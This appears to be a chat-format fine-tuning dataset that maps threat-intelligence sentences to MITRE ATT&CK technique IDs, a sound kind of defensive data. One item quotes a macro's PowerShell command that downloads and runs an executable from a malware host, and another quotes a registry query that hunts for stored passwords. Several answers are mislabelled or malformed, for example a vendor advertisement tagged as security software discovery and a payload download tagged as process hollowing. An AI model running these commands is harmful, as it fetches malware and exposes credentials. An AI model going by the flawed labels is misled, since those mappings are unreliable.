- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Turla has used various JavaScript-based backdoors."
- },
- {
- "role": "assistant",
- "content": "T1059.007 - Command and Scripting Interpreter: JavaScript"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "REvil can enumerate active services."
- },
- {
- "role": "assistant",
- "content": "T1007 - System Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Tropic Trooper can search for anti-virus software running on the system."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CookieMiner has used base64 encoding to obfuscate scripts on the system."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DanBot can use VNC for remote access to targeted systems."
- },
- {
- "role": "assistant",
- "content": "T1021.005 - Remote Services:VNC"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PcShare has used `rundll32.exe` for execution."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "collects the victim LAN IP address and sends it to the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "the filename changed from tru.dll to kibuyuink.exe, even though it remained a DLL and still required regsvr32.exe to run. Changing the filename extension is a common tactic seen in various malware infections."
- },
- {
- "role": "assistant",
- "content": "T1587.001 - Malware', 'T1546.001 - Event Triggered Execution: Change Default File Association"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The C2 communications begins with a beacon to the following URL: hxxp://www.windowspatch[.]com/khc? If the C2 server wishes to send a command, it will respond to the beacon above by echoing the whoami command results sent by the Trojan to the C2 in the URL"
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery', 'T1571 - Non-Standard Port', 'T1008 - Fallback Channels', 'T1043 - Commonly Used Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Saint Bot has injected its DLL component into `EhStorAurhn.exe`."
- },
- {
- "role": "assistant",
- "content": "T1055.001 - Process Injection: Dynamic-link Library Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "gathers and beacons the system time during installation."
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used to locate PDF, Excel, and Word documents during. The group also searched a compromised DCCC computer for specific terms."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The first lateral movement occurred to the domain controller not affected by the use of CVE-2020-1472. An executable was transferred to it via SMB using a domain administrator account"
- },
- {
- "role": "assistant",
- "content": "T1569.002 - System Services: Service Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "End users can benefit from security solutions such as Trend Micro Home Security for Mac, which provides comprehensive security and multi-device protection against cyberthreats"
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Taidoor has collected the MAC address of a compromised host; it can also use \"GetAdaptersInfo\" to identify network adapters."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Flame identifies security software such as antivirus through the Security module."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "These variants include system information collection (operating system, computer name), keylogger output, and browser password collection from Internet Explorer, Chrome and Firefox"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cleaver has created customized tools and payloads for functions including ARP poisoning, encryption, credential dumping, ASP.NET shells, web backdoors, process enumeration, WMI querying, HTTP and SMB communications, network interface sniffing, and keystroke logging."
- },
- {
- "role": "assistant",
- "content": "T1587.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Remcos can access a system’s webcam and take pictures."
- },
- {
- "role": "assistant",
- "content": "T1125 - Video Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GoldFinder has used HTTP for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Okrum has used a custom implementation of AES encryption to encrypt collected data."
- },
- {
- "role": "assistant",
- "content": "T1560.003 - Archive via Custom Method"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "xCaon has decoded strings from the C2 server before executing commands."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Registry key “Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\” is queried to gather proxy information with values ProxyEnable, Proxy: (NO), Proxy, ProxyServer"
- },
- {
- "role": "assistant",
- "content": "T1090 - Proxy', 'T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CORESHELL can communicate over SMTP and POP3 for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.003 - Mail Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BLINDINGCAN has used HTTPS over port 443 for command and control."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mongall has the ability to decrypt its payload prior to execution."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Conti ransomware can retrieve the ARP cache from the local system by using the GetIpNetTable() API call and check to ensure IP addresses it connects to are for local, non-internet systems."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Before writing a keystroke to the log, the malware obtains the current locale identifier using the ‘GetKeyboardLayout’ API. The retrieved value is checked against several hardcoded paths in which the low DWORD is set to 0x0429"
- },
- {
- "role": "assistant",
- "content": "T1614.001 - System Location Discovery: System Language Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In one instance, a log file recovered from an open indexed server revealed that an IP address (112.66.188.28) located in Hainan, China had been used to administer the command and control node that was communicating with malware on victim machines"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Finally, Reaver.v2 will execute the ‘~Update.lnk’ file in a new process, thus loading the recently dropped malicious CPL file"
- },
- {
- "role": "assistant",
- "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bumblebee can use multiple Native APIs."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Updater.exe program has the same program icon as CelasTradePro.exe. When run, it checks for the CheckUpdate parameter, collects the victim’s host information (System Owner/User Discovery [T1033]), encrypts the collected information with a hardcoded XOR encryption, and sends information to a C2 website (Exfiltration Over C2 Channel [T1041"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery', 'T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Hancitor has decoded Base64 encoded URLs to insert a recipient’s name into the filename of the Word document. Hancitor has also extracted executables from ZIP files."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can switch to a new C2 channel if the current one is broken."
- },
- {
- "role": "assistant",
- "content": "T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SMOKEDHAM can continuously capture keystrokes."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Emotet has been observed leveraging a module that can scrape email addresses from Outlook."
- },
- {
- "role": "assistant",
- "content": "T1087.003 - Email Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bankshot leverages a known zero-day vulnerability in Adobe Flash to execute the implant into the victims’ machines."
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT-C-36 has used a macro function to set scheduled tasks, disguised as those used by Google."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Some Orz versions have an embedded DLL known as MockDll that uses Process Hollowing and regsvr32 to execute another payload."
- },
- {
- "role": "assistant",
- "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Operation Wocao has used Mimikatz's DCSync to dump credentials from the memory of the targeted system."
- },
- {
- "role": "assistant",
- "content": "T1003.006 - OS Credential Dumping: DCSync"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can query service configuration information."
- },
- {
- "role": "assistant",
- "content": "T1007 - System Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BabyShark has executed the \"ver\" command."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "will copy files over to Windows Admin Shares (like ADMIN$) as part of lateral movement."
- },
- {
- "role": "assistant",
- "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A payload has searched all fixed drives on the victim for files matching a specified list of extensions."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Empire uses a command-line interface to interact with systems."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 used the service control manager on a remote system to disable services associated with security monitoring products."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses HTTPS, HTTP, and DNS for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The shellcode invokes PowerShell to issue a HTTP GET request for a random four (4) character URI on the root of autodiscovery[.]2bunny[.]com. The requests contain minimal HTTP headers since the PowerShell command is executed with mostly default parameters. Figure 5 depicts an HTTP GET request generated by the payload, with minimal HTTP headers"
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Some variants use ports 8080 and 8000 for C2."
- },
- {
- "role": "assistant",
- "content": "T1043 - Commonly Used Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LAPSUS$ has gained access to internet-facing systems and applications, including virtual private network (VPN), remote desktop protocol (RDP), and virtual desktop infrastructure (VDI) including Citrix."
- },
- {
- "role": "assistant",
- "content": "T1133 - External Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Malicious Document Decoy Document The attack starts with a spear-phishing email containing the HWP document named \"미북 정상회담 전망 및 대비.hwp\" (Prospects for US-North Korea Summit .hwp)"
- },
- {
- "role": "assistant",
- "content": "T1598.002 - Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WarzoneRAT can enumerate directories on a compromise host."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ROKRAT can collect the username from a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "USBferry can execute rundll32.exe in memory to avoid detection."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "pngdowner uses HTTP for command and control."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "reg query HKCU /f password /t REG_SZ /s"
- },
- {
- "role": "assistant",
- "content": "T1552.002 - Unsecured Credentials: Credentials in Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "IceApple can use HTTP GET to request and pull information from C2."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SynAck parses the export tables of system DLLs to locate and call various Windows API functions."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly 2.0 used the command \"query user\" on victim hosts."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The macro downloads a payload from hxxp://lokipanelhostingpanel[.]gq/work/kh/1.exe (SHA256: 84ed59953f57f5927b9843f35ca3c325155d5210824d3b79b060755827b51f72) by running the following command line process:cmd.exe /c powershell -W Hidden (New-Object System.NeT.WeBClieNT).DownloadFile('http://lokipanelhostingpanel[.]gq/work/kh/1.exe','%Public%\\\\\\\\svchost32.exe');Start-Process '%Public%\\\\\\\\svchost32.exeThe macro then attempts to kill Microsoft Office and Windows Defender processes using the ‘taskkill’ command"
- },
- {
- "role": "assistant",
- "content": "T1055.012 - Process Injection: Process Hollowing', 'T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The shellcode then creates a string that it uses to create a registry key to automatically run the final payload each time the system starts. It then opens the registry key 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon' and sets the value to the \"Shell\" subkey to the previously created string. Ultimately, the following registry key is created for persistence"
- },
- {
- "role": "assistant",
- "content": "T1547.014 - Active Setup', 'T1547.004 - Boot or Logon Autostart Execution: Winlogon Helper DLL"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AT&T Alien Labs™ has discovered a new campaign by threat group TeamTNT that is targeting multiple operating systems and applications. The campaign uses multiple shell/batch scripts, new open source tools, a cryptocurrency miner, the TeamTNT IRC bot, and more"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Indrik Spider used fake updates for FlashPlayer plugin and Google Chrome as initial infection vectors."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MoonWind saves information from its keylogging routine as a .zip file in the present working directory."
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 has used compromised service principals to make changes to the Office 365 environment."
- },
- {
- "role": "assistant",
- "content": "T1550.001 - Application Access Token"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT32's backdoor has used LZMA compression and RC4 encryption before exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Milan can identify users registered to a targeted machine."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DarkWatchman has the ability to enumerate file and folder names."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sandworm Team has used Base64 encoding within malware variants. Sandworm Team has also used ROT13 encoding, AES encryption and compression with the zlib library for their Python-based backdoor."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HyperStack uses named pipes to execute remote procedure calls (RPC) from the controller to the device hosting the HyperStack client. To move laterally, the implant tries to connect to another remote device’s IPC$ share, either using a null session or default credentials. IPC$ is a share that facilitates inter-process communication (IPC) by exposing named pipes to write to or read from. If the implant’s connection to the IPC$ is successful, the implant can forward RPC commands from the controller to the remote device, and likely has the capability to copy itself onto the remote device"
- },
- {
- "role": "assistant",
- "content": "T1559 - Inter-Process Communication', 'T1078.001 - Valid Accounts: Default Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OutSteel has relied on a user to execute a malicious attachment delivered via spearphishing."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "malware gathers the registered user and primary owner name via WMI."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PowerStallion uses a XOR cipher to encrypt command output written to its OneDrive C2 server."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Confucius has used a file stealer to steal documents and images with the following extensions: txt, pdf, png, jpg, doc, xls, xlm, odp, ods, odt, rtf, ppt, xlsx, xlsm, docx, pptx, and jpeg."
- },
- {
- "role": "assistant",
- "content": "T1119 - Automated Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
